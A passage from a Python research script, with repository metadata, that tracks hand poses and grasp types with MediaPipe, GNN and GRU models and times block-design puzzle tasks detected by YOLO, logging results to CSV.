[0,0,0,0,0,0,0,0,0]\r\n stream = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n\r\n list_hand_x = []\r\n list_hand_y = []\r\n \r\n ### If hand detected\r\n\r\n # Rendering results\r\n if results.multi_hand_landmarks:\r\n for num, hand in enumerate(results.multi_hand_landmarks):\r\n mp_drawing.draw_landmarks(frame, hand, mp_hands.HAND_CONNECTIONS, \r\n mp_drawing.DrawingSpec(color=(121, 22, 76), thickness=3, circle_radius=4),\r\n mp_drawing.DrawingSpec(color=(250, 44, 250), thickness=3, circle_radius=2),\r\n )\r\n \r\n # Render left or right detection\r\n #if get_label(num, hand, results):\r\n # text, coord = get_label(num, hand, results)\r\n # cv2.putText(image, text, coord, cv2.FONT_HERSHEY_SIMPLEX, 1, (50, 50, 50), 1, cv2.LINE_AA)\r\n \r\n hand_status = True\r\n\r\n ### Measure Angle \r\n # Draw angles to image from joint list\r\n draw_finger_angles(frame, results, joint_list_0)\r\n draw_finger_angles(frame, results, joint_list_1)\r\n draw_finger_angles(frame, results, joint_list_2)\r\n draw_finger_angles(frame, results, joint_list_3)\r\n draw_finger_angles(frame, results, joint_list_4)\r\n\r\n angle_0 = get_finger_angles(results, joint_list_0)\r\n angle_1 = get_finger_angles(results, joint_list_1)\r\n angle_2 = get_finger_angles(results, joint_list_2)\r\n angle_3 = get_finger_angles(results, joint_list_3)\r\n angle_4 = get_finger_angles(results, joint_list_4)\r\n\r\n hand_angle = [ angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2] ]\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n \r\n #writer_ang.writerow([ timer, timer_task, \r\n # angle_0[0], angle_0[1], angle_0[2],\r\n # angle_1[0], angle_1[1], angle_1[2],\r\n # angle_2[0], angle_2[1], angle_2[2], \r\n # angle_3[0], angle_3[1], angle_3[2],\r\n # angle_4[0], angle_4[1], angle_4[2], thumb_state ])\r\n\r\n #print( str(timer) + \" - \" + str(hand_angle) )\r\n\r\n ### Measure Distance\r\n \r\n # Create new variabel for wrist \r\n wrist = np.array( [hand.landmark[9].x, hand.landmark[9].y] )\r\n\r\n # Create new variabel for fingertip\r\n tip_0 = np.array([hand.landmark[4].x, hand.landmark[4].y] ) # , hand.landmark[4].z\r\n tip_1 = np.array([hand.landmark[8].x, hand.landmark[8].y] ) # , hand.landmark[8].z\r\n tip_2 = np.array([hand.landmark[12].x, hand.landmark[12].y] ) # , hand.landmark[12].z\r\n tip_3 = np.array([hand.landmark[16].x, hand.landmark[16].y] ) # , hand.landmark[16].z\r\n tip_4 = np.array([hand.landmark[20].x, hand.landmark[20].y] ) # , hand.landmark[20].z\r\n \r\n # Area of Hand\r\n \r\n for i in range(21):\r\n list_hand_x.append(hand.landmark[i].x)\r\n list_hand_y.append(hand.landmark[i].y)\r\n \r\n min_hand_x = int (min(list_hand_x) * f_width)\r\n min_hand_y = int (min(list_hand_y) * f_height)\r\n\r\n max_hand_x = int (max(list_hand_x) * f_width)\r\n max_hand_y = int (max(list_hand_y) * f_height)\r\n \r\n cv2.rectangle(frame, (min_hand_x, min_hand_y),(max_hand_x, max_hand_y), (255, 0, 0), 2) \r\n\r\n\r\n\r\n\r\n # Drawing circle in fingertip\r\n \"\"\"\r\n frame = cv2.circle(frame, ( int (hand.landmark[4].x * vwidth), \r\n int (hand.landmark[4].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[8].x * vwidth), \r\n int (hand.landmark[8].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n\r\n frame = cv2.circle(frame, ( int (hand.landmark[12].x * vwidth), \r\n int (hand.landmark[12].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[16].x * vwidth), \r\n int (hand.landmark[16].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \r\n frame = cv2.circle(frame, ( int (hand.landmark[20].x * vwidth), \r\n int (hand.landmark[20].y * vheight)), \r\n radius=10, color=(0, 0, 100), thickness=-1)\r\n \"\"\"\r\n\r\n \r\n \r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n #stream = stream.decode().split(',')\r\n #stream = [eval(i) for i in stream] #round((eval(i)/3.14), 2)\r\n\r\n stream[0] = angle_0[0] / 180\r\n stream[1] = angle_0[1] / 180\r\n stream[2] = angle_0[2] / 180\r\n stream[3] = angle_1[0] / 180\r\n stream[4] = angle_1[1] / 180\r\n stream[5] = angle_1[2] / 180\r\n stream[6] = angle_2[0] / 180\r\n stream[7] = angle_2[1] / 180\r\n stream[8] = angle_2[2] / 180\r\n stream[9] = angle_3[0] / 180\r\n stream[10] = angle_3[1] / 180\r\n stream[11] = angle_3[2] / 180\r\n stream[12] = angle_4[0] / 180\r\n stream[13] = angle_4[1] / 180\r\n stream[14] = angle_4[2] / 180\r\n\r\n x = torch.tensor([ [1],\r\n [stream[0]], [stream[1]], [stream[2]], \r\n [stream[3]], [stream[4]], [stream[5]],\r\n [stream[6]], [stream[7]], [stream[8]],\r\n [stream[9]], [stream[10]], [stream[11]],\r\n [stream[12]], [stream[13]], [stream[14]] ], dtype=torch.float)\r\n #print(x)\r\n \r\n data = Data(x=x, edge_index=edge_index.t().contiguous()) \r\n\r\n output_gnn = model_gnn(data.x, data.edge_index, data.batch) #\r\n predicted_gnn = (torch.max(torch.exp(output_gnn), 1)[1]).data.cpu().numpy()\r\n \r\n #predicted_gnn = torch.max(output_gnn, 1)\r\n\r\n probs = torch.nn.functional.softmax(output_gnn, dim=1)\r\n str_probs = str( format((torch.max(probs).item()*100),\".2f\") )\r\n\r\n if predicted_gnn.item() == 0:\r\n cv2.putText(frame, \"Rake \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[0]+=1\r\n\r\n elif predicted_gnn.item() == 1:\r\n cv2.putText(frame, \"Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[1]+=1\r\n\r\n elif predicted_gnn.item() == 2:\r\n cv2.putText(frame, \"Radial Palmar Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[2]+=1\r\n\r\n elif predicted_gnn.item() == 3:\r\n cv2.putText(frame, \"Radial Digital Grasp \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[3]+=1\r\n\r\n elif predicted_gnn.item() == 4:\r\n cv2.putText(frame, \"Inferior Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n grasp_pose[4]+=1\r\n \r\n elif predicted_gnn.item() == 5:\r\n cv2.putText(frame, \"Pincher \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n grasp_pose[5]+=1\r\n\r\n elif predicted_gnn.item() == 6:\r\n \r\n if hand.landmark[20].z > hand.landmark[4].z:\r\n cv2.putText(frame, \"Thumbs UP \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n thumb_state = 1\r\n\r\n else:\r\n cv2.putText(frame, \"Thumbs DOWN \" + str_probs + \"%\" , (min_hand_x, max_hand_y), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) \r\n thumb_state = -1 \r\n \r\n grasp_pose[6]+=1\r\n\r\n grasp_type = predicted_gnn.item()\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> PREDICT ACTION\r\n\r\n # Feature Scaling\r\n coll_hand.append(hand_angle)\r\n\r\n if len(coll_hand) == sequence_length:\r\n\r\n x_data = np.array(list(coll_hand))\r\n x_train = sc_input.transform(x_data)\r\n x_train = torch.tensor(x_train, dtype=torch.float32).to(device)\r\n x_train = x_train[None, :, :]\r\n \r\n output_rnn = model_rnn(x_train)\r\n confidence_rnn, predicted_rnn = torch.max(output_rnn.data, 1)\r\n \r\n str_conf = str( format(confidence_rnn.item()*10,\".2f\") )\r\n '''\r\n if predicted_rnn.item() == 0:\r\n cv2.putText(frame, \"No Rotation \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 1:\r\n cv2.putText(frame, \"Rotate Type 1 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 2:\r\n cv2.putText(frame, \"Rotate Type 2 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 3:\r\n cv2.putText(frame, \"Rotate Type 3 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 4:\r\n cv2.putText(frame, \"Rotate Type 4 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 5:\r\n cv2.putText(frame, \"Rotate Type 5 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2)\r\n elif predicted_rnn.item() == 6:\r\n cv2.putText(frame, \"Rotate Type 6 \" + str_conf + \"%\", (150, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 2) #+ str_conf + \"%\"\r\n '''\r\n rotate_type = predicted_rnn.item()\r\n #print(predicted.item())\r\n\r\n\r\n\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Block Detection\r\n\r\n # Frame threshold \r\n imgBlur = cv2.GaussianBlur(frame, (7,7), 1)\r\n imgGray = cv2.cvtColor(imgBlur, cv2.COLOR_BGR2GRAY)\r\n ret, imgThres = cv2.threshold(imgGray, 195, 255, cv2.THRESH_BINARY)\r\n \r\n # Make detections \r\n results = model_yolo(frame_next)\r\n\r\n df_tracked_objects = results.pandas().xyxy[0]\r\n list_tracked_objects = df_tracked_objects.values.tolist()\r\n #print(list_tracked_objects)\r\n \r\n #if len(list_tracked_objects) == 4: #>0\r\n\r\n box_num = 0\r\n box_face = 0\r\n box_list = []\r\n box_design = []\r\n box_distance = []\r\n box_design_sort = []\r\n\r\n box_near_hand = []\r\n #avg_confidence = []\r\n\r\n pos_x = []\r\n pos_y = []\r\n\r\n for x1, y1, x2, y2, conf_pred, cls_id, cls in list_tracked_objects:\r\n\r\n if conf_pred > 0.8:\r\n\r\n #avg_confidence.append( round(conf_pred,2) )\r\n\r\n center_x = int ((x1+x2)/2)\r\n center_y = int ((y1+y2)/2)\r\n x1 = int(x1)\r\n x2 = int(x2)\r\n y1 = int(y1)\r\n y2 = int(y2)\r\n w = int (x2-x1)\r\n h = int (y2-y1)\r\n\r\n box_distance.append( int (math.sqrt( pow(center_x, 2) + pow(center_y, 2) )) )\r\n #print(center_x, center_y)\r\n\r\n pos_x.append( int (center_x) )\r\n pos_y.append( int (center_y) )\r\n \r\n dim = (100, 100)\r\n imgBox = cv2.resize(imgThres[y1:y2, x1:x2], dim, interpolation = cv2.INTER_AREA)\r\n #cv2.imshow(\"Box_\"+str(box_num), imgBox)\r\n \r\n box_class = [ imgBox[50,25], imgBox[75,50], imgBox[50,75], imgBox[25,50] ]\r\n\r\n if box_class == [0,0,0,0] :\r\n box_face = 1\r\n box_design.append(1)\r\n elif box_class == [255,255,255,255]:\r\n box_face = 2\r\n box_design.append(2)\r\n #... dipisah\r\n elif box_class == [255,255,0,0]:\r\n box_face = 3\r\n box_design.append(3) \r\n elif box_class == [255,0,0,255]:\r\n box_face = 4\r\n box_design.append(4) \r\n elif box_class == [0,0,255,255]:\r\n box_face = 5\r\n box_design.append(5) \r\n elif box_class == [0,255,255,0]:\r\n box_face = 6\r\n box_design.append(6) \r\n \r\n cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 255, 0), 2)\r\n\r\n # Select Block Inside Hand\r\n\r\n if hand_status == True:\r\n if (center_x > min_hand_x-150 and center_x < max_hand_x+150 ) and (center_y > min_hand_y-150 and center_y < max_hand_y+150):\r\n cv2.rectangle(frame, (x1,y1), (x1+w, y1+h), (0, 0, 255), 5)\r\n box_near_hand.append(box_face)\r\n #print(box_face)\r\n #else:\r\n # print(0)\r\n #else:\r\n # print(0)\r\n \r\n cv2.putText(frame, str(round(conf_pred,2)), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n #cv2.putText(frame, \"id:\" +str(box_num), (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n box_num = box_num + 1\r\n roi_label = frame[y1:y1+50, x1:x1+50]\r\n\r\n if(box_face == 1):\r\n roi_label [np.where(mask_face_01)] = 0\r\n roi_label += face_01\r\n elif(box_face == 2):\r\n roi_label [np.where(mask_face_02)] = 0\r\n roi_label += face_02\r\n elif(box_face == 3):\r\n roi_label [np.where(mask_face_03)] = 0\r\n roi_label += face_03\r\n elif(box_face == 4):\r\n roi_label [np.where(mask_face_04)] = 0\r\n roi_label += face_04\r\n elif(box_face == 5):\r\n roi_label [np.where(mask_face_05)] = 0\r\n roi_label += face_05\r\n elif(box_face == 6):\r\n roi_label [np.where(mask_face_05)] = 0\r\n roi_label += face_06\r\n \r\n # Draw objects features\r\n #cv2.circle(frame, (x, y), radius=5, color=(0, 255, 0), thickness=-1)\r\n #cv2.rectangle(frame, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)\r\n #cv2.putText(frame, cls , (int(x1), int(y1) - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\r\n\r\n #print(box_design)\r\n #print (box_near_hand)\r\n\r\n \r\n\r\n\r\n if len(box_design) == 4 and len(box_distance) == 4:\r\n\r\n # >>>>>>>>>>>>\r\n\r\n box_0 = (pos_x[0], pos_y[0])\r\n box_1 = (pos_x[1], pos_y[1])\r\n box_2 = (pos_x[2], pos_y[2])\r\n box_3 = (pos_x[3], pos_y[3])\r\n\r\n frame = cv2.line(frame, box_0, box_1, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_0, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_0, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_2, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_1, box_3, (0, 0, 0), 2)\r\n frame = cv2.line(frame, box_2, box_3, (0, 0, 0), 2)\r\n\r\n pos_x_order = [ pos_x[0], pos_x[1], pos_x[2], pos_x[3] ]\r\n pos_y_order = [ pos_y[0], pos_y[1], pos_y[2], pos_y[3] ]\r\n\r\n #if ( abs(pos_x[0] - pos_x[1]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[0] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[2]) < 100) and \\\r\n # ( abs(pos_x[1] - pos_x[3]) < 100) and \\\r\n # ( abs(pos_x[2] - pos_x[3]) < 100):\r\n\r\n # start = time.time()\r\n \r\n #elif( abs(pos_y[0] - pos_y[1]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[0] - pos_y[3]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[2]) < 100) and \\\r\n # ( abs(pos_y[1] - pos_y[3]) < 100) and \\\r\n # ( abs(pos_y[2] - pos_y[3]) < 100):\r\n\r\n # start = time.time()\r\n\r\n # >>>>>>>>>>>>\r\n\r\n len_0 = int (math.sqrt( (pos_x[0]-pos_x[1])**2 + (pos_y[0]-pos_y[1])**2 ) )\r\n len_1 = int (math.sqrt( (pos_x[1]-pos_x[2])**2 + (pos_y[1]-pos_y[2])**2 ) )\r\n len_2 = int (math.sqrt( (pos_x[2]-pos_x[3])**2 + (pos_y[2]-pos_y[3])**2 ) )\r\n len_3 = int (math.sqrt( (pos_x[3]-pos_x[0])**2 + (pos_y[3]-pos_y[0])**2 ) )\r\n len_4 = int (math.sqrt( (pos_x[0]-pos_x[2])**2 + (pos_y[0]-pos_y[2])**2 ) )\r\n len_5 = int (math.sqrt( (pos_x[1]-pos_x[3])**2 + (pos_y[1]-pos_y[3])**2 ) )\r\n\r\n # Order Len\r\n len_order = [ len_0, len_1, len_2, len_3, len_4, len_5 ]\r\n len_rect = sorted(len_order)\r\n\r\n if ( abs(len_rect[0] - len_rect[1]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[0] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[2]) < 50) and \\\r\n ( abs(len_rect[1] - len_rect[3]) < 50) and \\\r\n ( abs(len_rect[2] - len_rect[3]) < 50):\r\n\r\n # >>>>>>>>>>>>\r\n \r\n sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n for i in range(len(sort_index)):\r\n box_design_sort.append(box_design[sort_index[i]])\r\n \r\n print(\"----- TASK :\" + str(box_design_sort))\r\n\r\n if box_design_sort == ans_01:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_01)] = 0\r\n test_label += img_01\r\n task_state = 1\r\n \r\n if(timer_flag_01):\r\n end = time.time()\r\n timer_task_01 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_01)\r\n\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n timer_flag_01 = False\r\n else:\r\n print (\"TASK 1 COMPLETED in \" + str(timer_task_01) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_02:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_02)] = 0\r\n test_label += img_02\r\n task_state = 1\r\n \r\n if(timer_flag_02):\r\n end = time.time()\r\n timer_task_02 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_02)\r\n\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n timer_flag_02 = False\r\n else:\r\n print (\"TASK 2 COMPLETED in \" + str(timer_task_02) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_03:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_03)] = 0\r\n test_label += img_03\r\n task_state = 1\r\n\r\n if(timer_flag_03):\r\n end = time.time()\r\n timer_task_03 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_03)\r\n\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n timer_flag_03 = False\r\n else:\r\n print (\"TASK 3 COMPLETED in \" + str(timer_task_03) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_04:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_04)] = 0\r\n test_label += img_04\r\n task_state = 1\r\n \r\n if(timer_flag_04):\r\n end = time.time()\r\n timer_task_04 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_04)\r\n \r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n timer_flag_04 = False\r\n else:\r\n print (\"TASK 4 COMPLETED in \" + str(timer_task_04) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_05:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_05)] = 0\r\n test_label += img_05\r\n task_state = 1\r\n \r\n if(timer_flag_05):\r\n end = time.time()\r\n timer_task_05 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_05)\r\n\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n timer_flag_05 = False\r\n else:\r\n print (\"TASK 5 COMPLETED in \" + str(timer_task_05) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_06:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_06)] = 0\r\n test_label += img_06\r\n task_state = 1\r\n \r\n if(timer_flag_06):\r\n end = time.time()\r\n timer_task_06 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_06)\r\n\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n timer_flag_06 = False\r\n else:\r\n print (\"TASK 6 COMPLETED in \" + str(timer_task_06) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_07:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_07)] = 0\r\n test_label += img_07\r\n task_state = 1\r\n \r\n if(timer_flag_07):\r\n end = time.time()\r\n timer_task_07 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_07)\r\n \r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n timer_flag_07 = False\r\n else:\r\n print (\"TASK 7 COMPLETED in \" + str(timer_task_07) +\" seconds\")\r\n start = time.time()\r\n \r\n \r\n elif box_design_sort == ans_08:\r\n test_label = frame[20:120, 20:120]\r\n test_label [np.where(mask_img_08)] = 0\r\n test_label += img_08\r\n task_state = 1\r\n \r\n if(timer_flag_08):\r\n end = time.time()\r\n timer_task_08 = round((end-start - timer_return), 2)\r\n timer_task_all.append(timer_task_08)\r\n \r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n timer_flag_08 = False\r\n else:\r\n print (\"TASK 8 COMPLETED in \" + str(timer_task_08) +\" seconds\")\r\n start = time.time()\r\n \r\n\r\n else:\r\n print (\"NOT COMPLETE\")\r\n\r\n box_design = []\r\n box_distance = []\r\n box_design_sort = []\r\n\r\n\r\n #cv2.imshow('Stream', frame)\r\n\r\n #else:\r\n # cv2.imshow('Stream', frame_next)\r\n \r\n #elif len(box_design) != 0 :\r\n #sort_index = sorted(range(len(box_distance)), key=lambda k: box_distance[k])\r\n\r\n #for i in range(len(sort_index)):\r\n # box_design_sort.append(box_design[sort_index[i]])\r\n \r\n # print(box_design) #_sort\r\n \r\n #else:\r\n # print(\"NOT DETECTED\")\r\n\r\n\r\n #print(str(n_frame) + \" processed\")\r\n #cv2.imshow('Stream', np.squeeze(results.render()))\r\n\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Put Text\r\n\r\n #cv2.putText(frame, \"Timer \", (150, 750), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 2)\r\n #cv2.putText(frame, str(timer_task) + \" s\", (350, 750), cv2.FONT_HERSHEY_SIMPLEX, 3, (0, 0, 255), 5)\r\n\r\n #if(timer_flag_01 == False):\r\n # cv2.putText(frame, \"Task 1 : \" + str(timer_task_01) + \" s\", (150, 800), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_02 == False):\r\n # cv2.putText(frame, \"Task 2 : \" + str(timer_task_02) + \" s\", (150, 830), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_03 == False):\r\n # cv2.putText(frame, \"Task 3 : \" + str(timer_task_03) + \" s\", (150, 860), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_04 == False):\r\n # cv2.putText(frame, \"Task 4 : \" + str(timer_task_04) + \" s\", (150, 890), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_05 == False):\r\n # cv2.putText(frame, \"Task 5 : \" + str(timer_task_05) + \" s\", (150, 920), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_06 == False):\r\n # cv2.putText(frame, \"Task 6 : \" + str(timer_task_06) + \" s\", (150, 950), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_07 == False):\r\n # cv2.putText(frame, \"Task 7 : \" + str(timer_task_07) + \" s\", (150, 980), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n #if(timer_flag_08 == False):\r\n # cv2.putText(frame, \"Task 8 : \" + str(timer_task_08) + \" s\", (150, 1010), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\r\n \r\n cv2.imshow('Stream', frame)\r\n\r\n timer = round (time.time() - start_zero , 2) \r\n writer_sta.writerow([ timer, timer_task, grasp_type, rotate_type, str(box_near_hand) ])\r\n\r\n #if (thumb_state == 1 or task_state == 1): # or thumb_state == -1\r\n # efficacy_state = 1\r\n #else:\r\n # efficacy_state = 0q\r\n\r\n if (hand_status == True):\r\n writer_ang.writerow([ timer, timer_task, \r\n angle_0[0], angle_0[1], angle_0[2],\r\n angle_1[0], angle_1[1], angle_1[2],\r\n angle_2[0], angle_2[1], angle_2[2], \r\n angle_3[0], angle_3[1], angle_3[2],\r\n angle_4[0], angle_4[1], angle_4[2], task_state, thumb_state ])\r\n \r\n\r\n\r\n print( \"GRASP :\" + str(grasp_pose) + \" ; TIMER :\" + str(timer_task_all) )\r\n\r\n #n_contour = 0\r\n\r\n #else:\r\n #print(n_frame)\r\n #cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)\r\n\r\n #cv2.imshow('Stream', frame)\r\n \r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n break\r\n\r\n n_frame = n_frame + 1\r\n\r\n else:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n", "repo_name": "anom-tmu/bdt-multiscopic", "sub_path": "03_testing_uppertable.py", "file_name": "03_testing_uppertable.py", "file_ext": "py", "file_size_in_byte": 53667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "csv.writer", "line_number": 40, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 71, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 72, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 73, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch_geometric.nn.global_mean_pool", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 102, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 104, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 105, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GraphConv", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch_geometric.nn.global_mean_pool", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 135, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 153, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 164, "usage_type": "name"}, {"api_name": "torch.nn.GRU", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 181, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 225, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 228, "usage_type": "call"}, {"api_name": "mediapipe.solutions", "line_number": 239, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 240, "usage_type": "attribute"}, {"api_name": 